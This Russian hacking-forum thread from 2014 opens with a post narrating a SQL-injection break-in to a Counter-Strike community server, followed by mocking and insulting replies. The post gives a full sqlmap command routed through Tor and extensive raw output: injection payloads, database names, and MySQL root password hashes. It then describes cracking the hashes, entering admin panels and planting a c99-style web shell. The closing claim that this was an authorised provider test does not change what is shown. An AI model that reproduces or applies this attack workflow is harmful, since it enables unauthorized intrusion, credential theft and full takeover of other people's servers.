Rector
Золотой пользователь
Зарегистрирован: 22.10.2012
Сообщений: 754
Продолжаем тему "взломов по айпи".
Есть некий сервер контерстрайщиков -) Админ считает себя крутым геймером и бубунтоидом (смех в зале =))).
Замутил сервак на бубунте и думает - меня никто не взломает.
По адресу http://xx.xxx.info расположен собственно сайт статистики cпойлер
/forumlinexp/Files/2014/7bb4ac5b-2342-4f77-9a1f-94a1bb36e28a.png

===
Есть форум cпойлер
/forumlinexp/Files/2014/17712924-6454-4f15-b203-95d5bfc024ac.png

--
Проверка ресурса http://xx.xxx.info сканером Acunetix показала, что параметр filtrdb в файле /myacscreen/index.php является уязвимым. Что такое SQLi многие знают. Гуру инжекта этот пост не заинтересует, а для хуюзеров будет интересно.
++
Ну что же, пригласим sqlmap на нелегкую работу...

Делаем запрос к сайту следующим образом...
$ python sqlmap.py -u "http://xx.xxx.info/myacscreen/index.phpfiltrdb='" --random-agent --tor -f --banner --current-user --passwords --tables --exclude-sysdbs

В результате работы получаем текущего юзера, под которым работает база MySQL, не удивляемся что это даже root, и его хэшированный пароль -))
cпойлер
sqlmap identified the following injection points with a total of 68 HTTP(s) requests:
---
Place: GET
Parameter: filtrdb
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: filtrdb=' AND (SELECT 7355 FROM(SELECT COUNT(*),CONCAT(0x717a796771,(SELECT (CASE WHEN (7355=7355) THEN 1 ELSE 0 END)),0x716d6d6e71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- YLUE

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: filtrdb=' AND SLEEP(5)-- FnYg
---
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.4.6
back-end DBMS: MySQL 5.0
available databases [12]:
[*] bans
[*] forumlinexp
[*] gagged
[*] hlstatsx
[*] information_schema
[*] mysql
[*] papuas
[*] performance_schema
[*] phpmyadmin
[*] psychostat
[*] smskey
[*] test

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: filtrdb
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: filtrdb=' AND (SELECT 7355 FROM(SELECT COUNT(*),CONCAT(0x717a796771,(SELECT (CASE WHEN (7355=7355) THEN 1 ELSE 0 END)),0x716d6d6e71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- YLUE

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: filtrdb=' AND SLEEP(5)-- FnYg
---
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.4.6
back-end DBMS: MySQL 5.0
Database: phpmyadmin
[7 tables]
+------------------+
| pma_bookmark     |
| pma_column_info  |
| pma_history      |
| pma_pdf_pages    |
| pma_relation     |
| pma_table_coords |
| pma_table_info   |
+------------------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: filtrdb
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: filtrdb=' AND (SELECT 7355 FROM(SELECT COUNT(*),CONCAT(0x717a796771,(SELECT (CASE WHEN (7355=7355) THEN 1 ELSE 0 END)),0x716d6d6e71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- YLUE

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: filtrdb=' AND SLEEP(5)-- FnYg
---
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.4.6
back-end DBMS: MySQL 5.0
No tables found
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: filtrdb
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: filtrdb=' AND (SELECT 7355 FROM(SELECT COUNT(*),CONCAT(0x717a796771,(SELECT (CASE WHEN (7355=7355) THEN 1 ELSE 0 END)),0x716d6d6e71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- YLUE

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: filtrdb=' AND SLEEP(5)-- FnYg
---
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.4.6
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: filtrdb
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: filtrdb=' AND (SELECT 7355 FROM(SELECT COUNT(*),CONCAT(0x717a796771,(SELECT (CASE WHEN (7355=7355) THEN 1 ELSE 0 END)),0x716d6d6e71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- YLUE

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: filtrdb=' AND SLEEP(5)-- FnYg
---
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.4.6
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: active fingerprint: MySQL >= 5.5.0
               banner parsing fingerprint: MySQL 5.5.31
banner:    '5.5.31-0ubuntu0.12.10.1'
current user:    'root@localhost'
database management system users password hashes:
[*] debian-sys-maint [1]:
    password hash: NULL
[*] root [3]:
    password hash: *144C152330C7501A23A328E8762E8FDCEF4A946C
    password hash: *40A4E98A996A326003A7B44A61358A5F67E4F2A1
    password hash: *D8317F92ED37A910DDC6634FDD9821BDD590A192
[*] sms-platezhki [1]:
    password hash: *AED9E546CC4CEBACBF259138B949A7F19D04E407


Также видим какие базы есть на этом сервере -)
+
Хэш пароля админа базы MySQL, отправим на расшифровку в cmd5.ru....
++++++++++++++++++++++++++++++++++++++++++++++++
Готово....
Ну что, пора заходить в админку -))
cпойлер
/forumlinexp/Files/2014/0f43e8db-282a-4222-bdc1-a8a0d2e3798a.png

---
Все базы как на ладони -))
cпойлер
/forumlinexp/Files/2014/54592907-9315-4958-8459-3e26d65959fd.png


Посмотрим кто рулит админом в базе psychostats...
cпойлер
/forumlinexp/Files/2014/0f4a08bd-f18f-4c05-a13e-a24e699aa462.png


Ага! Некий MOLOT, крутой админ -))

Зайдем к нему в админку psychostats....
cпойлер
/forumlinexp/Files/2014/2503b6b8-5b09-4efc-b67b-b59830268b4c.png


ОК! Мы уже можем тут крутить-вертеть -))
cпойлер
/forumlinexp/Files/2014/fb3b6134-cbaa-43d3-b5bc-9823b6d15752.png


+++
Далее давайте посмотрим базу forumlinexp и хэш админа отправим на расшифровку....
cпойлер
/forumlinexp/Files/2014/81fa4803-ffa3-4c31-a7c5-c26ad2772272.png

.......................
ОК! Заходим в админку этого phpBB3 форума и в стилях заливаем шелл, типа с99...
cпойлер
/forumlinexp/Files/2014/448eaf31-d226-46cb-b405-cfac7f3aee8b.JPG


Сам шелл...

cпойлер
/forumlinexp/Files/2014/0b1a234f-2f80-4e83-b870-d2c05c2c53a3.png

=====
К сожалению, предыдущего перед крайним из скриншотов с реального сервера не сохранилось, поэтому взял картинку с нэта...Не пинайте ногами -) Тут главное методика и принцип.
=====
В итоге, получаем полный контроль над базой MySQL и можем делать с этим сайтом крутых геймеров CS всё что захочем -) Всё зависит от Вашей фантазии -)
===========================================================================
note: Взлом производился в рамках компании по проверке безопасности одного из городских провайдеров.
PS Спасибо за внимание.
PPS Замечания, предложения, срач
Теги: SQLi  
Последнее изменение: Rector, 14.02.2014 12:12

Комментарии14

0 0

Babusha
Модератор
Зарегистрирован: 07.10.2012
Сообщений: 701
Сообщение от Rector файле /myacscreen/index.php
Так это phpBB дырявый оказался
-- Вера - шедевр воплощения Дьявола.

0 0

MOP3E
Золотой пользователь
Зарегистрирован: 11.01.2013
Сообщений: 1978
О! Свой своего, чтоб чужие боялись Но вот это:
Сообщение от Rector К сожалению, скриншотов с реального сервера не сохранилось, поэтому взял картинку с нэта...Не пинайте ногами -) Тут главное методика и принцип.
Наводит на определённые сомнения в компетентности топикстартера. :)

И, да - когда будет взломана винда

0 0

Babusha
Модератор
Зарегистрирован: 07.10.2012
Сообщений: 701
Ректор, прости, анальный глюченый форум Луки как всегда в своем репертуаре.
http://i.imgur.com/XGAK41M.png

Пришлось твой пост удалить, иначе нельзя прокуртить страницу ниже спойлера, супер. Кинь на любой пастебин-сервис.
-- Вера - шедевр воплощения Дьявола.

0 0

Rector
Золотой пользователь
Зарегистрирован: 22.10.2012
Сообщений: 754
Сообщение от Babusha Ректор, прости, анальный глюченый форум Луки как всегда в своем репертуаре.

Да не говори -)) Погоди...Счас залью..
-- Зри в корень!

0 0

Rector
Золотой пользователь
Зарегистрирован: 22.10.2012
Сообщений: 754
Babusha, здесь. Копипаста с шелла непосредственно.
/forumlinexp/Files/2014/37ba1626-9e97-4af3-8c0c-9a5413a02130.png

-- Зри в корень!

0 0

wr224
Новичок
Зарегистрирован: 28.12.2013
Сообщений: 89
Rector, а если этот MOLOT тебя найдет и молотом по башке

0 0

Rector
Золотой пользователь
Зарегистрирован: 22.10.2012
Сообщений: 754
Сообщение от wr224 Rector, а если этот MOLOT тебя найдет и молотом по башке

Да не найдёт. А если и искать будет, то тогда точно признается - я лошара =)))
++
По хорошему, ему надо было мне отписать, ну хоть на форуме, я бы разъяснил ему в чем проблема.
-- Зри в корень!

0 0

Rector
Золотой пользователь
Зарегистрирован: 22.10.2012
Сообщений: 754
Сообщение от MOP3E И, да - когда будет взломана винда
Так это...Ломают каждый день ажно =))
--
А ну да, ты же по ссылкам не ходишь -) А то вдруг твои печеньки спиздят -)
-- Зри в корень!

0 0

MOP3E
Золотой пользователь
Зарегистрирован: 11.01.2013
Сообщений: 1978
Сообщение от Rector Так это...Ломают каждый день ажно =))
И шо Главное - у тебя хуй что получается взломать. Ну, если без дефолтного пароля или беспарольного админа. :)
Предупреждение: Оскорбление | переход на личности

0 0

Rector
Золотой пользователь
Зарегистрирован: 22.10.2012
Сообщений: 754
Сообщение от MOP3E И шо Главное - у тебя хуй что получается

Ты как всегда MOP3E, долбоёб редкостный -)) Может ты тут покажешь мастер-класс взлома линуха, да в цветной консоли, да через провода в скайпе -)) А! Что молчишь по этому поводу, пиздабол толстый
==
Или уже тебе кольчугу из фольги сделали и ты не боишься по вечерам ходить в своём районе на улице Мира -))
++
Эй толстый! (с) Песня
-- Зри в корень!
Предупреждение: Оскорбление | переход на личности

0 0

MOP3E
Золотой пользователь
Зарегистрирован: 11.01.2013
Сообщений: 1978
Сообщение от Rector Ты как всегда MOP3E, долбоёб редкостный -)) Может ты тут покажешь мастер-класс взлома линуха, да в цветной консоли, да через провода в скайпе -)) А! Что молчишь по этому поводу, пиздабол толстый
==
Или уже тебе кольчугу из фольги сделали и ты не боишься по вечерам ходить в своём районе на улице Мира -))
++
Эй толстый! (с) Песня
Мдя, а пукан-то как знатно порвало! Рехтур, когда винду уже по IP взломаешь Шестой год пошёл как не можешь.

0 0

Rector
Золотой пользователь
Зарегистрирован: 22.10.2012
Сообщений: 754
О! MOP3E, отдуплился! -)) Расскажи как скайп через провода ходит -)
-- Зри в корень!

0 0

MOP3E
Золотой пользователь
Зарегистрирован: 11.01.2013
Сообщений: 1978
Сообщение от Rector О! MOP3E, отдуплился! -))
Да как-то пока не до споров с убогими. Иди пока, тренируйся винду по IP взламывать, какир.

0 0

МОРЗЯНКА
Новичок
Зарегистрирован: 08.10.2013
Сообщений: 5
Ебят! Задолбали, чесслово! Хорош уже, хочется пожить спокойно, ибо консенсус, априори, найден не будет.
-- Такой большой, а в SCSI веpишь